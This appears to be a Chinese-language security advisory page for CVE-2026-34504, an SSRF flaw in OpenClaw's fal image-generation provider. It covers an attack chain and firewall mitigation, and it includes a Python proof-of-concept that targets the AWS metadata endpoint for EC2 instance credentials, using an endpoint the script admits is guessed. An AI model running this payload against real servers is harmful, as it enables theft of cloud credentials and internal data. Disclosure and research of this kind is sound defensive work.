CVE-2026-34504 CVSS 8.3 高危

CVE-2026-34504 OpenClaw SSRF漏洞致信息泄露

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34504

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

8.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.28之前的版本中存在服务器端请求伪造（SSRF）漏洞。该漏洞源于fal provider的image-generation-provider.ts组件未对图像下载请求进行有效校验。攻击者可利用此漏洞通过恶意或受损的fal relay获取内部服务URL，进而窃取敏感元数据和响应数据。

技术细节

该漏洞源于OpenClaw项目中fal provider的image-generation-provider.ts组件在处理图像生成逻辑时，未对用户提供的或来自上游的URL进行严格的安全验证与隔离。攻击者可以利用服务器端请求伪造（SSRF）技术，通过构造恶意的图像下载请求，诱导OpenClaw服务器向内部网络地址发起HTTP请求。由于系统未对“fal relay”来源实施有效的信任边界控制，存在被利用的风险。攻击者可借此扫描内网端口、访问本地敏感文件或获取云平台元数据服务（如AWS的169.254.169.254）中的临时凭证。最终，内部服务的响应数据会通过图像生成管道泄露给攻击者，导致内网沦陷或数据泄露。

攻击链分析

STEP 1

1. 侦察与发现

攻击者识别目标运行的是OpenClaw 2026.3.28之前的版本，并确认启用了fal provider功能。

STEP 2

2. 构造恶意载荷

攻击者向OpenClaw的图像生成接口发送请求，将参数中的图像URL设置为内部网络地址（如云元数据服务地址）。

STEP 3

3. 触发SSRF

OpenClaw服务器在处理请求时，未过滤URL，直接向内部地址发起HTTP请求获取内容。

STEP 4

4. 数据回传

内部服务的响应数据（如IAM凭证、配置信息）被服务器接收，并通过图像生成管道返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, internal_url):
    """
    PoC for CVE-2026-34504
    Demonstrates fetching internal metadata via vulnerable OpenClaw image generation endpoint.
    """
    # Example endpoint structure based on typical API patterns
    endpoint = f"{target_url}/api/v1/generate"
    
    headers = {
        "Content-Type": "application/json"
    }
    
    # Payload attempting to fetch AWS metadata
    payload = {
        "provider": "fal",
        "input": {
            "image_url": internal_url  # e.g., http://169.254.169.254/latest/meta-data/
        }
    }
    
    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Potential SSRF successful. Response received:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost:8080" # Replace with actual target
    internal_target = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
    exploit_ssrf(target, internal_target)

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施

若无法立即升级，建议在网络防火墙中阻断服务器对云元数据IP（如169.254.169.254）及其他内网敏感网段的访问请求，并监控异常的出站流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表